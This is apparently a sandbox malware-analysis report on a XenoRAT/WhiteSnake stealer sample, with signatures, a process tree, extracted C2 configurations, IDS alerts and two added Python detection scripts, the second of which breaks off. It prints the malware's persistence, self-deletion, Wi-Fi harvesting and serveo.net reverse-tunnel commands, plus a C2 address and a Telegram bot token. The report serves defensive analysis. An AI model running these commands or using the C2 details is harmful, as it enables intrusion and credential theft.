Windows Analysis Report
0LpFv1haTA.exe

Overview

General Information

Sample name: 0LpFv1haTA.exe (renamed because the original name is a hash value)
Original sample name: 1bafb4856a31ae27271fbd2ee1574a4f.exe
Analysis ID: 1520806
MD5: 1bafb4856a31ae27271fbd2ee1574a4f
SHA1: b8b3649d959524df2c4e8a94434fc0de90f95005
SHA256: 91cfd0498b16d33890d8d4f4f1b69daaad5d703f898f46b811f73e92be19e5ff
Tags: exe, XenoRAT, user-abuse_ch

Detection

WhiteSnake Stealer, XenoRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected Telegram RAT
Yara detected WhiteSnake Stealer
Yara detected XenoRAT
.NET source code contains potential unpacker
.NET source code contains very large strings
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Self deletion via cmd or bat file
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Potentially Suspicious Malware Callback Communication
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses known network protocols on non-standard ports
Uses netsh to modify the Windows network and firewall settings
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Port Forwarding Activity Via SSH.EXE
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Process Tree

  • System is w10x64
  • 0LpFv1haTA.exe (PID: 5948 cmdline: "C:\Users\user\Desktop\0LpFv1haTA.exe" MD5: 1BAFB4856A31AE27271FBD2EE1574A4F)
    • cmd.exe (PID: 5784 cmdline: "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\Desktop\0LpFv1haTA.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 4996 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • timeout.exe (PID: 6104 cmdline: timeout /t 3 MD5: 100065E21CFBBDE57CBA2838921F84D6)
      • schtasks.exe (PID: 4288 cmdline: schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • 0LpFv1haTA.exe (PID: 1964 cmdline: "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" MD5: 1BAFB4856A31AE27271FBD2EE1574A4F)
        • cmd.exe (PID: 7164 cmdline: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 1680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • chcp.com (PID: 2284 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
          • netsh.exe (PID: 7096 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
          • findstr.exe (PID: 5996 cmdline: findstr /R /C:"[ ]:[ ]" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
        • cmd.exe (PID: 5856 cmdline: "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 5620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • chcp.com (PID: 2684 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
          • netsh.exe (PID: 2952 cmdline: netsh wlan show networks mode=bssid MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
          • findstr.exe (PID: 1976 cmdline: findstr "SSID BSSID Signal" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
        • ssh.exe (PID: 5856 cmdline: "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:7634 serveo.net MD5: C05426E6F6DFB30FB78FBA874A2FF7DC)
          • conhost.exe (PID: 7124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • manager.exe (PID: 8056 cmdline: "C:\Users\user\AppData\Roaming\manager.exe" MD5: DA118F70D089DABFAB1B43B4CD87DB65)
          • manager.exe (PID: 8128 cmdline: "C:\Users\user\AppData\Roaming\XenoManager\manager.exe" MD5: DA118F70D089DABFAB1B43B4CD87DB65)
            • schtasks.exe (PID: 7184 cmdline: "schtasks.exe" /Create /TN "mswindow" /XML "C:\Users\user\AppData\Local\Temp\tmp4A67.tmp" /F MD5: 48C2FE20575769DE916F48EF0676A965)
              • conhost.exe (PID: 2860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • 0LpFv1haTA.exe (PID: 5500 cmdline: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe MD5: 1BAFB4856A31AE27271FBD2EE1574A4F)
    • cmd.exe (PID: 3852 cmdline: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 5968 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • netsh.exe (PID: 744 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • findstr.exe (PID: 1520 cmdline: findstr /R /C:"[ ]:[ ]" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • cmd.exe (PID: 5300 cmdline: "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 5260 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • netsh.exe (PID: 5616 cmdline: netsh wlan show networks mode=bssid MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • findstr.exe (PID: 6196 cmdline: findstr "SSID BSSID Signal" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • ssh.exe (PID: 7232 cmdline: "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:7634 serveo.net MD5: C05426E6F6DFB30FB78FBA874A2FF7DC)
      • conhost.exe (PID: 7240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WerFault.exe (PID: 7488 cmdline: C:\Windows\system32\WerFault.exe -u -p 5500 -s 3644 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • 0LpFv1haTA.exe (PID: 7992 cmdline: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe MD5: 1BAFB4856A31AE27271FBD2EE1574A4F)
  • manager.exe (PID: 2108 cmdline: C:\Users\user\AppData\Roaming\XenoManager\manager.exe MD5: DA118F70D089DABFAB1B43B4CD87DB65)
  • 0LpFv1haTA.exe (PID: 7388 cmdline: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe MD5: 1BAFB4856A31AE27271FBD2EE1574A4F)
  • 0LpFv1haTA.exe (PID: 174540 cmdline: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe MD5: 1BAFB4856A31AE27271FBD2EE1574A4F)
  • 0LpFv1haTA.exe (PID: 337928 cmdline: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe MD5: 1BAFB4856A31AE27271FBD2EE1574A4F)
  • cleanup
{"C2 url": "193.149.187.135", "Mutex Name": "Xeno_rat_nd8912d", "Install Folder": "appdata"}
{"C2 url": "https://api.telegram.org/bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage"}
Yara Overview

Initial Sample
Source | Rule | Description | Author
0LpFv1haTA.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security

Dropped Files
Source | Rule | Description | Author
C:\Users\user\AppData\Roaming\manager.exe | JoeSecurity_XenoRAT | Yara detected XenoRAT | Joe Security
C:\Users\user\AppData\Roaming\XenoManager\manager.exe | JoeSecurity_XenoRAT | Yara detected XenoRAT | Joe Security
C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security

Memory Dumps
Source | Rule | Description | Author
00000029.00000000.2648249695.0000000000242000.00000002.00000001.01000000.0000000B.sdmp | JoeSecurity_XenoRAT | Yara detected XenoRAT | Joe Security
00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: 0LpFv1haTA.exe PID: 1964 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: 0LpFv1haTA.exe PID: 1964 | JoeSecurity_WhiteSnake | Yara detected WhiteSnake Stealer | Joe Security
Process Memory Space: 0LpFv1haTA.exe PID: 1964 | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
(4 further entries not expanded)

Unpacked PEs
Source | Rule | Description | Author
41.0.manager.exe.240000.0.unpack | JoeSecurity_XenoRAT | Yara detected XenoRAT | Joe Security

                      System Summary

Source: Process started | Author: Jonathan Cheong, oscd.community | Data: Command: "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\Desktop\0LpFv1haTA.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe", CommandLine: "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\Desktop\0LpFv1haTA.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\0LpFv1haTA.exe", ParentImage: C:\Users\user\Desktop\0LpFv1haTA.exe, ParentProcessId: 5948, ParentProcessName: 0LpFv1haTA.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\Desktop\0LpFv1haTA.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe", ProcessId: 5784, ProcessName: cmd.exe
Source: Network Connection | Author: Florian Roth (Nextron Systems) | Data: DestinationIp: 193.149.187.135, DestinationIsIpv6: false, DestinationPort: 4444, EventID: 3, Image: C:\Users\user\AppData\Roaming\XenoManager\manager.exe, Initiated: true, ProcessId: 8128, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49744
Source: Network Connection | Author: Florian Roth (Nextron Systems) | Data: DestinationIp: 185.253.7.60, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe, Initiated: true, ProcessId: 1964, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49708
Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems) | Data: Command: "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:7634 serveo.net, CommandLine: "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:7634 serveo.net, CommandLine|base64offset|contains: , Image: C:\Windows\System32\OpenSSH\ssh.exe, NewProcessName: C:\Windows\System32\OpenSSH\ssh.exe, OriginalFileName: C:\Windows\System32\OpenSSH\ssh.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe", ParentImage: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe, ParentProcessId: 1964, ParentProcessName: 0LpFv1haTA.exe, ProcessCommandLine: "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:7634 serveo.net, ProcessId: 5856, ProcessName: ssh.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "schtasks.exe" /Create /TN "mswindow" /XML "C:\Users\user\AppData\Local\Temp\tmp4A67.tmp" /F, CommandLine: "schtasks.exe" /Create /TN "mswindow" /XML "C:\Users\user\AppData\Local\Temp\tmp4A67.tmp" /F, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\XenoManager\manager.exe", ParentImage: C:\Users\user\AppData\Roaming\XenoManager\manager.exe, ParentProcessId: 8128, ParentProcessName: manager.exe, ProcessCommandLine: "schtasks.exe" /Create /TN "mswindow" /XML "C:\Users\user\AppData\Local\Temp\tmp4A67.tmp" /F, ProcessId: 7184, ProcessName: schtasks.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f, CommandLine: schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f, CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\Desktop\0LpFv1haTA.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5784, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f, ProcessId: 4288, ProcessName: schtasks.exe

                      Persistence and Installation Behavior

Source: Process started | Author: Joe Security | Data: Command: "schtasks.exe" /Create /TN "mswindow" /XML "C:\Users\user\AppData\Local\Temp\tmp4A67.tmp" /F, CommandLine: "schtasks.exe" /Create /TN "mswindow" /XML "C:\Users\user\AppData\Local\Temp\tmp4A67.tmp" /F, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\XenoManager\manager.exe", ParentImage: C:\Users\user\AppData\Roaming\XenoManager\manager.exe, ParentProcessId: 8128, ParentProcessName: manager.exe, ProcessCommandLine: "schtasks.exe" /Create /TN "mswindow" /XML "C:\Users\user\AppData\Local\Temp\tmp4A67.tmp" /F, ProcessId: 7184, ProcessName: schtasks.exe

                      Stealing of Sensitive Information

Source: Process started | Author: Joe Security | Data: Command: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", CommandLine: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe", ParentImage: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe, ParentProcessId: 1964, ParentProcessName: 0LpFv1haTA.exe, ProcessCommandLine: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", ProcessId: 7164, ProcessName: cmd.exe
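The process tree above and the Sigma matches in the three sections just listed describe the same four behaviours: a scheduled task whose action (or XML definition) lives under AppData, deletion of the original dropper by the cmd chain it spawned, enumeration of saved WLAN profiles through netsh, and an SSH reverse tunnel to the public relay serveo.net. The following Python is an added example, not Joe Sandbox or Sigma code, that runs those checks over process-creation events. The events are constructed from the command lines in the report (Sysmon-style field names Image / ParentImage / CommandLine are an assumption), and the two benign records at the end are made up to show the rules stay quiet on ordinary use of schtasks and ssh.

```python
"""Process-creation triage for the behaviours in this report's process
tree and Sigma matches. Added example; not Joe Sandbox or Sigma code.

Field names follow Sysmon Event ID 1 (Image, ParentImage, CommandLine);
the records are hand-built from the command lines shown in the report.
"""
import re
from dataclasses import dataclass

# Constructed sample events (command lines copied from the report's tree).
SAMPLE_EVENTS = [
    {   # dropper's install chain: scheduled task, self-delete, relaunch from AppData
        "Image": r"C:\Windows\System32\cmd.exe",
        "ParentImage": r"C:\Users\user\Desktop\0LpFv1haTA.exe",
        "CommandLine": r'"C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && '
                       r'schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f && '
                       r'DEL /F /S /Q /A "C:\Users\user\Desktop\0LpFv1haTA.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe"',
    },
    {   # the schtasks child of that chain
        "Image": r"C:\Windows\System32\schtasks.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r'schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f',
    },
    {   # WLAN profile enumeration by the installed copy
        "Image": r"C:\Windows\System32\cmd.exe",
        "ParentImage": r"C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe",
        "CommandLine": r'"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"',
    },
    {   # reverse tunnel: remote port 80 on serveo.net forwarded to local 7634
        "Image": r"C:\Windows\System32\OpenSSH\ssh.exe",
        "ParentImage": r"C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe",
        "CommandLine": r'"ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:7634 serveo.net',
    },
    {   # XenoRAT persistence: task definition read from a temp XML file
        "Image": r"C:\Windows\SysWOW64\schtasks.exe",
        "ParentImage": r"C:\Users\user\AppData\Roaming\XenoManager\manager.exe",
        "CommandLine": r'"schtasks.exe" /Create /TN "mswindow" /XML "C:\Users\user\AppData\Local\Temp\tmp4A67.tmp" /F',
    },
    # Two benign records (made up) that use the same binaries legitimately.
    {
        "Image": r"C:\Windows\System32\schtasks.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r'schtasks /create /tn "NightlyBackup" /sc DAILY /st 02:00 /tr "C:\Program Files\Backup\backup.exe"',
    },
    {
        "Image": r"C:\Windows\System32\OpenSSH\ssh.exe",
        "ParentImage": r"C:\Windows\System32\WindowsTerminal.exe",
        "CommandLine": r'"ssh.exe" -p 22 admin@build-host',
    },
]


@dataclass
class Finding:
    rule: str
    image: str
    detail: str


# Folders an unprivileged user can write to; a task that runs from, or is
# defined in, one of these is the pattern behind the "Schtasks From Env Var
# Folder" and "Scheduled temp file as task" signatures in this report.
USER_WRITABLE = re.compile(r"\\(?:appdata|temp|programdata|public)\\", re.I)
# /tr or /xml argument, quoted (may contain spaces) or bare.
TASK_TARGET = re.compile(r'/(?:tr|xml)\s+(?:"([^"]+)"|(\S+))', re.I)


def detect(event):
    image = event["Image"]
    parent = event.get("ParentImage", "")
    cmd = event["CommandLine"]
    low = cmd.lower()
    findings = []

    # 1. schtasks /create whose action or XML definition sits in a user-writable path
    if "schtasks" in low and "/create" in low:
        m = TASK_TARGET.search(cmd)
        target = (m.group(1) or m.group(2)) if m else ""
        if USER_WRITABLE.search(target):
            detail = f"task target {target}"
            if re.search(r"/rl\s+highest", low):
                detail += "; requests highest run level"
            if re.search(r"/sc\s+minute", low) and "/mo" not in low:
                detail += "; re-runs every minute (no /mo modifier)"
            findings.append(Finding("schtasks_user_writable_path", image, detail))

    # 2. a DEL that names the parent's own image: the dropper removing itself
    if parent and re.search(r"\bdel\b", low) and parent.lower() in low:
        findings.append(Finding("self_delete_via_cmd", image, f"deletes parent image {parent}"))

    # 3. saved Wi-Fi profile enumeration (key=clear additionally dumps the PSK)
    if re.search(r"netsh\s+wlan\s+show\s+profile", low):
        detail = "enumerates saved WLAN profiles"
        if "key=clear" in low:
            detail += "; exports cleartext keys"
        findings.append(Finding("wlan_profile_harvest", image, detail))

    # 4. ssh -R exposes a local port through a remote host (here a public relay)
    if image.lower().endswith("ssh.exe"):
        m = re.search(r"(?:^|\s)-R\s+(\S+)", cmd)
        if m:
            detail = f"reverse forward {m.group(1)} via {cmd.split()[-1]}"
            if "stricthostkeychecking=no" in low:
                detail += "; host key checking disabled"
            findings.append(Finding("ssh_reverse_tunnel", image, detail))
    return findings


def scan(events):
    return [f for e in events for f in detect(e)]


def rule_counts(events):
    counts = {}
    for f in scan(events):
        counts[f.rule] = counts.get(f.rule, 0) + 1
    return counts


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.image}: {f.detail}")
```

The task rule fires three times on the sample set (the cmd chain, its schtasks child, and the XenoRAT /XML task), which is the expected duplication when both a shell and its child are logged; deduplicate on the task target if you feed this real telemetry. The self-delete check is deliberately narrow (the DEL must name the parent image) so that ordinary cleanup scripts do not match.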
Suricata IDS alerts

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-27T23:28:02.050959+0200 | 2045869 | 1 | A Network Trojan was detected | 192.168.2.5 | 49740 | 149.154.167.220 | 443 | TCP

2024-09-27T23:27:14.915873+0200 | 2050602 | 1 | A Network Trojan was detected | 192.168.2.5 | 49708 | 185.253.7.60 | 8080 | TCP
2024-09-27T23:27:16.303924+0200 | 2050602 | 1 | A Network Trojan was detected | 192.168.2.5 | 49711 | 185.253.7.60 | 8080 | TCP

2024-09-27T23:27:14.861894+0200 | 2050601 | 1 | A Network Trojan was detected | 192.168.2.5 | 49708 | 185.253.7.60 | 8080 | TCP
2024-09-27T23:27:16.252698+0200 | 2050601 | 1 | A Network Trojan was detected | 192.168.2.5 | 49711 | 185.253.7.60 | 8080 | TCP

2024-09-27T23:27:37.244014+0200 | 2045868 | 1 | Successful Credential Theft Detected | 192.168.2.5 | 49729 | 167.99.138.249 | 8080 | TCP
2024-09-27T23:27:58.620125+0200 | 2045868 | 1 | Successful Credential Theft Detected | 192.168.2.5 | 49737 | 206.189.109.146 | 80 | TCP
2024-09-27T23:27:59.523921+0200 | 2045868 | 1 | Successful Credential Theft Detected | 192.168.2.5 | 49738 | 45.82.65.63 | 80 | TCP
2024-09-27T23:28:00.420730+0200 | 2045868 | 1 | Successful Credential Theft Detected | 192.168.2.5 | 49739 | 188.120.242.78 | 8817 | TCP
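The two extracted configurations above and the Suricata alerts just listed give the network indicators for this sample: the XenoRAT C2 on TCP/4444, the 185.253.7.60:8080 destination contacted by the stealer stage, the serveo.net relay used for the SSH reverse tunnel, and a Telegram Bot API URL whose path carries the bot token. The following Python is an added example, not Joe Sandbox or Suricata code; it matches those indicators against constructed proxy/flow records (the relay and benign destination addresses are documentation IPs, assumed) and extracts the bot token while redacting it in findings. The Telegram traffic in this analysis is TLS (Suricata saw it on 149.154.167.220:443), so the URL path is only available with TLS inspection; without it, the host-side configuration is where the token comes from.

```python
"""Network-side matching of this sample's C2 indicators. Added example;
not Joe Sandbox or Suricata code.

Indicators come from the extracted configurations and the Sigma/Suricata
network events in this report. The records below are constructed
proxy/flow entries, not captured traffic; the relay and benign IPs are
documentation addresses (assumed).
"""
import re

# XenoRAT C2 (TCP/4444 in the Sigma network event) and the 185.253.7.60:8080
# destination that raised Suricata SIDs 2050601/2050602.
C2_ENDPOINTS = {("193.149.187.135", 4444), ("185.253.7.60", 8080)}
# Public SSH relay named in the ssh -R command line.
TUNNEL_RELAYS = {"serveo.net"}
# Telegram Bot API paths look like /bot<numeric id>:<secret>/<method>.
TELEGRAM_BOT_PATH = re.compile(r"^/bot(\d{8,12}):([A-Za-z0-9_-]{30,})/([A-Za-z]+)")

# Constructed records: (src_ip, dst_ip, dst_port, host_or_sni, url_path).
SAMPLE_RECORDS = [
    ("192.168.2.5", "149.154.167.220", 443, "api.telegram.org",
     "/bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage"),
    ("192.168.2.5", "193.149.187.135", 4444, "", ""),
    ("192.168.2.5", "185.253.7.60", 8080, "", "/"),
    ("192.168.2.5", "203.0.113.9", 22, "serveo.net", ""),              # relay IP assumed
    ("192.168.2.5", "149.154.167.220", 443, "api.telegram.org", "/"),  # benign: no bot path
    ("192.168.2.5", "203.0.113.10", 443, "updates.example", "/feed"),  # benign
]


def redact(secret):
    """Keep enough of a token to correlate on, never enough to reuse it."""
    return secret[:4] + "..." + secret[-4:]


def bot_token(path):
    """Full bot token from a Bot API path, for an abuse report to Telegram."""
    m = TELEGRAM_BOT_PATH.match(path)
    return f"{m.group(1)}:{m.group(2)}" if m else None


def classify(record):
    src, dst, port, host, path = record
    findings = []
    # Exact IP:port pairs from the configuration and the network events.
    if (dst, port) in C2_ENDPOINTS:
        findings.append(("c2_endpoint", f"{dst}:{port}"))
    # The report only names the relay host, so match on hostname/SNI, not IP.
    if host.lower() in TUNNEL_RELAYS:
        findings.append(("ssh_relay", f"{host} ({dst}:{port})"))
    # Bot API use is only suspicious with the /bot<token>/ path; plain
    # api.telegram.org traffic is what the messenger client itself produces.
    m = TELEGRAM_BOT_PATH.match(path)
    if m and host.lower() == "api.telegram.org":
        bot_id, secret, method = m.groups()
        findings.append(("telegram_bot_api", f"bot {bot_id} {method} token {redact(secret)}"))
    return findings


def scan(records):
    return [(r[0], r[1], rule, detail) for r in records for rule, detail in classify(r)]


def rule_counts(records):
    counts = {}
    for _, _, rule, _ in scan(records):
        counts[rule] = counts.get(rule, 0) + 1
    return counts


if __name__ == "__main__":
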